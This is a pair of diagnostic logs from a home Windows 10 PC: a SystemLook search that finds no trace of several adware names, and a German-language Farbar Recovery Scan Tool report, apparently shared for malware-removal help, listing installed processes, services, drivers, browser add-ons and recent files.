SystemLook 30.07.11 by jpshortstuff
Log created at 18:27 on 23/05/2017 by Dino
Administrator - Elevation successful

========== folderfind ==========

Searching for "*Note-up*"
No folders found.

Searching for "*Kuaizip*"
No folders found.

Searching for "*Microleaves*"
No folders found.

Searching for "*Noobzo*"
No folders found.

Searching for "*SearchModule*"
No folders found.

Searching for "*DPower*"
No folders found.

Searching for "*BestCleaner*"
No folders found.

Searching for "*Spark*"
No folders found.

Searching for "*youndoo.com*"
No folders found.

========== regfind ==========

Searching for "Note-up"
No data found.

Searching for "Kuaizip"
No data found.

Searching for "Microleaves"
No data found.

Searching for "Noobzo"
No data found.

Searching for "SearchModule"
No data found.

Searching for "DPower"
No data found.

Searching for "BestCleaner"
No data found.

Searching for "Spark"
No data found.

Searching for "youndoo.com"
No data found.

-= EOF =-
         
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 22-05-2017
durchgeführt von Dino (Administrator) auf **** (23-05-2017 18:33:28)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" 

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{0784e829-3340-11e7-867e-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-23]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [113592 2017-05-23] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-05-23] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-23] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [93624 2017-05-23] (Malwarebytes)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-23 18:33 - 2017-05-23 18:33 - 00019150 _____ C:\Users\Dino\Desktop\FRST.txt
2017-05-23 18:27 - 2017-05-23 18:31 - 00002088 _____ C:\Users\Dino\Desktop\SystemLook.txt
2017-05-23 18:27 - 2017-05-23 18:26 - 00165376 _____ C:\Users\Dino\Desktop\SystemLook_x64.exe
2017-05-23 18:23 - 2017-05-23 18:24 - 00025577 _____ C:\Users\Dino\Desktop\Fixlog.txt
2017-05-23 18:23 - 2017-05-23 18:23 - 00000000 ____D C:\Users\Dino\Desktop\FRST-OlderVersion
2017-05-23 17:48 - 2017-05-23 17:48 - 00000000 ___HD C:\OneDriveTemp
2017-05-22 18:25 - 2017-05-23 18:33 - 00093624 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00113592 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-05-22 18:25 - 2017-05-23 18:25 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00187320 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-05-22 18:25 - 2017-05-22 18:25 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-22 18:25 - 2017-05-22 18:25 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 18:25 - 2017-05-09 16:37 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-05-22 18:15 - 2017-05-22 18:10 - 04102600 _____ C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
2017-05-22 18:13 - 2017-05-23 18:18 - 00000000 ____D C:\AdwCleaner
2017-05-21 21:26 - 2017-05-21 21:31 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.26.49_log.txt
2017-05-21 21:23 - 2017-05-21 21:24 - 00005376 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.23.57_log.txt
2017-05-21 21:19 - 2017-05-23 18:23 - 02429952 _____ (Farbar) C:\Users\Dino\Desktop\FRST64.exe
2017-05-21 21:19 - 2017-05-21 20:48 - 04922400 _____ (AO Kaspersky Lab) C:\Users\Dino\Desktop\tdsskiller.exe
2017-05-21 21:00 - 2017-05-21 21:19 - 00285358 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_21.00.59_log.txt
2017-05-21 20:51 - 2017-05-21 20:51 - 00000492 _____ C:\TDSSKiller.3.1.0.15_21.05.2017_20.51.38_log.txt
2017-05-19 14:28 - 2017-05-23 18:33 - 00000000 ____D C:\FRST
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
